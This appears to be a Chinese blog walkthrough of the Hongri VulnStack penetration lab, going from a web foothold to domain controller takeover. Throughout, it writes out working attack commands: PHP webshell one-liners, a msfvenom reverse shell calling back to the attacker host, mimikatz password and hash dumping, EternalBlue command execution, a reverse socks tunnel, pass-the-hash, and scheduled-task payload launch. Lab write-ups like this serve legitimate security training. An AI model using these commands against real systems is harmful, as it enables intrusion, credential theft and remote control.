前言
最近做了做红日的vulnstack,感觉蛮好玩的,写篇文章记录一下解题过程。
环境搭建
首先配置模拟内外网环境
其中,192.168.52.0为模拟内网
192.168.119.0为模拟外网
接下来进入win7,首先修改已过期的密码为hongrisec@2021
接下来开启其web服务
kali网卡配置如下:
win7网卡配置如下:
win server 2008网卡配置如下:
win 2003 网络配置如下:
至此,环境搭建基本完成
本次实验网络拓扑
内网域环境中只有win7可以访问外网,攻击机只能直接从外网访问到受害机的web服务,内网机器可以互相访问
实验开始
外网渗透
首先在攻击机中访问受害机的web服务
在通知公告中看到提示
按提示进入后台
首先注意到了文件上传的功能,想到可不可以上一个马,但是多番尝试并没有发现上传点,那么就挨个点一点找一找灵感
点到前台模板这里的时候发现这里可以管理模板php文件,此处很有可能存在漏洞
尝试在index.php中写入一句话木马(因为这个文件好找)并使用蚁剑连接
webshell上传成功,接下来先对受害机进行简单的信息收集
系统信息
IP
可以看到受害机存在两个IP,所以可以猜测目标主机存在一个内网环境,对此主机完成渗透后可以进行下一步的内网渗透
当前权限
这个靶场在这里做得有些点太简单了。。
获得web权限以后居然直接管理员了。。
至此,第一台受害机的最高权限已经被我们获取,不过这里还有第二种方法可以获取权限,下面简单讲一下
外网渗透2
发现目标主机存在web服务后先进行一波扫描看看有没有什么比较敏感的信息
使用nikto扫描器输入命令进行扫描
nikto -h 192.168.119.138
从扫描结果中可以得知,目标网站存在phpmyadmin
尝试弱密码(root:root)登录,成功
登录phpmyadmin之后就是老生常谈的通过MySQL日志尝试写马
但前提是mysql开启了日志功能
执行
show variables like '%general%'
查看mysql日志是否开启
这里默认并没有开启日志,所以接下来我们要把日志功能打开并指定日志存放目录
输入命令
set global general_log='on'
成功开启日志
接下来设置日志文件路径以及文件类型
输入命令
set global general_log_file='C:/phpstudy/www/192.168.119.138'
写马
输入命令
select "<?php eval($_REQUEST[1]);?>"
蚁剑尝试连接
成功上线,权限依然是最高的
所以接下来便是内网渗透了
内网渗透
在本次实验中我们主要采用msf来对内网进行渗透,所以首先我们利用事前上传的webshell来把msf生成的马上传到受害机
输入命令生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.119.130 lport=1234 -f exe >haixian.exe
开启监听
上传木马并运行
可以在msf中看到主机上线成功
使用
getsystem
进行提权
找个稳定的进程迁移一下
getpid
ps
migrate 3360
接下来使用msf自带的mimikatz模块尝试抓取系统密码
load kiwi
creds_wdigest
creds_all
无果,尝试上传一个猕猴桃进行抓取
upload /home/haixian/mimikatz.exe c:\\
shell
mimikatz.exe
privilege::debug
sekurlsa::logonPasswords
成功抓取管理员明文密码hongrisec@2021
既然已经抓到了管理员的明文密码,那么我们自然是不能满足于简单的meterpreter了,我们要尝试打开受害机的图形化操作界面了(也就是远程桌面)
首先使用nmap扫一下3389有没有开启
nmap 192.168.119.138 -p 3389
可以看到3389端口存在防火墙过滤
我们使用msf的post/windows/manage/enable_rdp模块尝试关闭防火墙
use post/windows/manage/enable_rdp
options
set session 2
run
关闭成功,尝试打开远程桌面
使用刚刚抓取的密码登陆成功
对内网信息进行收集
至此,对这台win7的渗透基本完成,接下来继续进行内网横向移动
net time /domain #查看时间服务器,判断主域,主域服务器都做时间服务器
net user /domain #查看域用户
net view /domain #查看有几个域
ipconfig /all #查询本机IP段,所在域等
net config Workstation #当前计算机名,全名,用户名,系统版本,工作站域,登陆域
net user #本机用户列表
net group "domain computers" /domain #查看域内所有的主机名
net group "domain admins" /domain #查看域管理员
net group "domain controllers" /domain #查看域控
在这里虽然可以在win7上上传nmap来扫描内网存活主机以及对应端口,但是接下来对其他几个内网主机的渗透都基本依托攻击机的msf完成,所以我们这里直接在msf中添加路由来使攻击机可以访问到内网资源
run autoroute -s 192.168.52.0/24
接下来使用ping命令探测内网存活主机
chcp 65001(解决乱码问题)
for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.52.%I | findstr "TTL="
可以看到除了win7这台机器内网中还有两台存活的主机
首先尝试扫描永恒之蓝
use auxiliary/scanner/smb/smb_version
options
set rhosts 192.168.52.141
run
set rhosts 192.168.52.143
run
445端口开启,存在smb服务,永恒之蓝有希望!
use auxiliary/scanner/smb/smb_ms17_010
options
set rhosts 192.168.52.141
run
可见192.168.52.141这台主机很有可能存在永恒之蓝漏洞,尝试打一下
use auxiliary/admin/smb/ms17_010_command
options
set command whoami
set rhosts 192.168.52.141
run
成功执行了命令
那么接下来尝试打开3389端口利用刚刚抓到的域管理员账号登录
查看端口
use auxiliary/admin/smb/ms17_010_command
options
set command netstat -na
set rhosts 192.168.52.141
run
发现并没有3389开放,这样我们只好帮助他开一下~
use auxiliary/admin/smb/ms17_010_command
options
set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
set rhosts 192.168.52.141
run
可以看到3389已经成功开启,下一步便是开启远程桌面了
由于内网中的192.168.52.141主机无法直接访问到攻击机,所以这里需要使用到隐藏通信隧道技术,借助win7作为跳板机完成内网穿透
相关知识这里简述,具体可参照https://www.freebuf.com/articles/network/275436.html
首先在攻击机中执行
upload /home/haixian/ew-master c:\\
接下来在攻击机本地添加转接隧道
./ew_for_linux64 -s rcsocks -l 1080 -e 4444
将1080收到的数据转发给4444端口
接下来在受害机win7中执行
ew_for_Win.exe -s rssocks -d 192.168.119.130 -e 4444
攻击机收到回显,可见隧道搭建成功
接下来便可以打开第二台受害机的远程桌面了(使用proxychains添加代理)
vim /etc/proxychains.conf
添加内容
socks5 192.168.119.130 1080
保存并退出后执行
proxychains rdesktop 192.168.52.141
使用之前抓取的域管账号登陆
接下来就要向域控进军了
刚刚对两台内网主机进行的扫描结果显示永恒之蓝在域控这台主机上也可能存在
use auxiliary/admin/smb/ms17_010_command
options
set command whoami
set rhosts 192.168.52.138
run
命令执行成功,接下来便是重复之前的步骤以开启域控的远程桌面
use auxiliary/admin/smb/ms17_010_command
options
set command REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
set rhosts 192.168.52.138
run
由于socks5隧道之前已经搭建好了,proxychains也已经设置好了,所以这里不需要重复配置
直接尝试打开远程桌面
proxychains rdesktop 192.168.52.138
总是打不开,只能换个思路了,尝试之前用mimikatz抓取的哈希值进行哈希传递登录域控
执行
mimikatz.exe
sekurlsa::pth /domain:god.org /user:administrator /ntlm:a45a7246dd74b64a67f22fd7020f1bd8
尝试访问域控共享服务
dir \\192.168.52.138\c$
访问成功
尝试把WIN7上的马(正向连接)上传到域控
copy C:\1.exe \\192.168.52.138\c$
设置好监听后在域控上设置一个定时任务运行木马即可弹回shell来
schtasks /create /tn "hx" /tr C:\1.exe /sc once /st 17:54 /S 192.168.52.138 /RU System /u administrator /p "hongrisec@2021"
写在后面
这个靶场难度较低,对新手比较友好,外网渗透部分用到了弱密码,mysql日志写马等知识,而内网部分大概只用到了永恒之蓝这一个漏洞,最多加上msf各种模块的一些使用,接下来笔者会挑战更难一些的靶场,敬请期待。
感谢阅读,溜了溜了~
来源:freebuf.com 2021-07-14 20:49:48 by: secur1ty
请登录后发表评论
注册